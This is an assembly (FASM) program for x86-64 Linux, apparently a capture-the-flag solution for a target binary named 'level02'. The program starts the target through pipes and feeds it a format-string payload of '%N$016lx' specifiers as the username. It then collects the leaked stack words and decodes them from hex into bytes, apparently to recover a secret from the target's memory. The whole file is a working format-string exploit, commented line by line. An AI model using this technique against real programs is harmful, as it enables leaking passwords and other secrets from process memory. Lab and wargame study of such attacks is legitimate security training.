; Flat assembler (FASM) source: FASM directive syntax ("format", "entry",
; "struc", "segment") and "$" as the hex prefix. No libc; raw Linux syscalls.
; The trailing operand of "format ELF64 executable" is presumably the ELF
; OS/ABI identification byte (3 = GNU/Linux) — TODO confirm against the FASM manual.
format ELF64 executable $03
entry _start
; string: struc used as "<label> string <byte list>". Emits the bytes at
; <label> and defines <label>.length as the number of bytes emitted, so the
; write() calls can take the length symbolically instead of a hard-coded count.
; "." inside a struc body refers to the label the struc is applied to.
struc string data*& {
.: db data
.length = ($ - .)
}
segment executable readable
;-----------------------------------------------------------------------
; _start — process entry point (no libc; raw Linux x86-64 syscalls,
; SysV register order: rdi, rsi, rdx; result in rax).
; Syscall numbers used: 0 read, 1 write, 3 close, $16 pipe, $20 dup,
; $21 dup2, $39 fork, $3B execve, $3C exit.
;
; Stack layout after the prologue (rbp = 16-byte-aligned entry rsp):
;   [rbp-$60] = [rsp+$00] : pipe A fd pair  {read fd, write fd}, dword each
;   [rbp-$58] = [rsp+$08] : pipe B fd pair  {read fd, write fd}
;   [rbp-$50] = [rsp+$10] : $50-byte read buffer
; Register roles: r12 = dup() of the original stdout (fd 1);
;   r13 = append cursor into the $100-byte collection buffer allocated at .read;
;   rbx/bl = state flags (see .read and .convert).
;
; Error handling: only the two pipe() calls are checked. dup/dup2/write and
; a failed fork (negative rax) are not detected, and in .read only a zero
; return ends the loop — a negative (-errno) return is scanned as data.
;-----------------------------------------------------------------------
_start:
and rsp, not $0F                        ; 16-byte align the stack
cld                                     ; DF=0: scas/movs/lods below run forward
mov rbp, rsp
sub rsp, $50 + $10                      ; two fd pairs ($10) + $50-byte buffer
mov rax, $16                            ; pipe(&pipeA)  -> [rsp]
mov rdi, rsp
syscall
test rax, rax
jnz .exit                               ; any nonzero return is treated as failure
mov rax, $16                            ; pipe(&pipeB)  -> [rsp+$08]
lea rdi, qword [rsp+$08]
syscall
test rax, rax
jnz .exit
mov rax, $20                            ; r12 = dup(1): keep a handle on the real stdout
mov rdi, $01
syscall
mov r12, rax
mov rax, $21                            ; dup2(pipeA.read, 0): stdin <- pipe A
mov edi, dword [rsp]
xor rsi, rsi
syscall
mov rax, $21                            ; dup2(pipeB.write, 1): stdout -> pipe B
mov edi, dword [rsp+$0C]
mov rsi, $01
syscall
mov rax, $39                            ; fork(); both processes inherit the redirections
syscall
test rax, rax
jz .child                               ; rax == 0 in the child; parent (or error) falls through
; --- parent: feed the child's stdin through pipe A, then collect pipe B ---
mov rax, $01                            ; write(pipeA.write, _username, _username.length)
mov edi, dword [rsp+$04]
mov rsi, _username
mov rdx, _username.length
syscall
mov rax, $01                            ; write(pipeA.write, _password, _password.length)
mov edi, dword [rsp+$04]
mov rsi, _password
mov rdx, _password.length
syscall
mov rax, $03                            ; close(pipeA.write): child's stdin reaches EOF
mov edi, dword [rsp+$04]
syscall
xor rbx, rbx                            ; bl = 0: opening '<' not yet seen
sub rsp, $0100                          ; $100-byte collection buffer at rsp
mov r13, rsp                            ; r13 = append cursor into it
; .read: read $50-byte chunks from pipe B into [rbp-$50] and append the bytes
; between the first '<' and the following '>' to the collection buffer.
; The scan is flag-driven: ZF after "repnz scasb" tells whether the delimiter
; was hit (ZF=1) or rcx ran out (ZF=0).
.read:
xor rax, rax                            ; read(pipeB.read, buf, $50)
mov edi, dword [rbp-$58]
lea rsi, qword [rbp-$50]
mov rdx, $50
syscall
test eax, eax
jz .exit                                ; EOF; note a negative error return is not caught
lea rdi, qword [rbp-$50]
mov rcx, $50                            ; NOTE(review): scans all $50 bytes, not just the count read
test rbx, rbx
jnz .skip                               ; '<' was already consumed in an earlier chunk
mov al, '<'
repnz scasb                             ; on hit: rdi -> byte after '<', rcx = bytes left
jnz .read                               ; no '<' in this chunk: fetch the next one
mov bl, $01                             ; remember that the opening '<' was seen
.skip:
mov rsi, rdi                            ; copy source = current scan position
mov rdx, rcx                            ; rdx = bytes remaining in the chunk
mov al, '>'
repnz scasb                             ; look for the closing '>'
setz r9b                                ; r9b = 1 if '>' was found
movzx rax, r9b
sub rdx, rcx                            ; rdx = bytes consumed by the scan
mov rcx, rdx
sub rcx, rax                            ; drop the '>' itself from the copy length
mov rdi, r13
rep movsb                               ; append [rsi, rsi+rcx) to the collection buffer
mov r13, rdi                            ; advance the cursor
test r9b, r9b
jz .read                                ; '>' not seen yet: keep reading
; .convert: treats the collected text as hex digit pairs (no validation of
; the character class) and decodes each pair into one byte, pushing the
; bytes downward from rsp so the decoded output is byte-reversed.
; bl toggles "first nibble parked in ah" / "second nibble"; rcx counts the
; remaining pairs; rdx keeps the total for the final write().
.convert:
mov rcx, r13
sub rcx, rsp                            ; collected length in bytes
shr rcx, $01                            ; number of hex pairs (an odd trailing digit is ignored)
jrcxz .exit                             ; nothing collected
mov rdx, rcx                            ; rdx = decoded byte count = write length
mov rsi, rsp
xor bl, bl
.reload:
lodsb                                   ; al = next hex digit character
cmp al, $61
jae .lower                              ; >= 'a'
cmp al, $41
jae .upper                              ; >= 'A'
sub al, $30                             ; '0'..'9' -> 0..9
jmp .next
.lower:
sub al, $61                             ; 'a'.. -> 0..
jmp .adjust
.upper:
sub al, $41                             ; 'A'.. -> 0..
.adjust:
add al, $0A                             ; letters -> 10..
.next:
test bl, bl
jnz .toAscii                            ; this is the second nibble of the pair
mov ah, al                              ; park the high nibble
not bl
jmp .reload
.toAscii:
xor bl, bl
shl ah, $04
add al, ah                              ; al = (high << 4) | low
dec rsp
mov byte [rsp], al                      ; prepend below rsp: output comes out reversed
loop .reload                            ; one iteration per decoded byte
mov rax, $01                            ; write(saved_stdout, rsp, rdx)
mov rdi, r12
mov rsi, rsp
syscall
jmp .exit
; --- child: execve(_program, argv, envp) with argv = {_program, NULL}, envp = NULL ---
.child:
mov rax, $3B
mov rdi, _program
xor rdx, rdx                            ; envp = NULL
push rdx rdi                            ; FASM multi-push: NULL, then _program -> argv array on the stack
mov rsi, rsp                            ; argv = rsp
syscall                                 ; returns only on failure, then falls into .exit
.exit:
mov rax, $3C                            ; exit(0)
xor rdi, rdi
syscall
segment readable                        ; read-only data; not writable, not executable
; _username / _password: bytes written to the child's stdin via pipe A.
; The "string" struc defines _username.length / _password.length for the
; write() calls in _start. _password is a bare newline.
_username string "<%26$016lx%25$016lx%24$016lx%23$016lx%22$016lx>", $0A
_password string $0A
; _program: NUL-terminated path passed to execve as both pathname and argv[0].
_program: db "/home/users/level02/level02", $00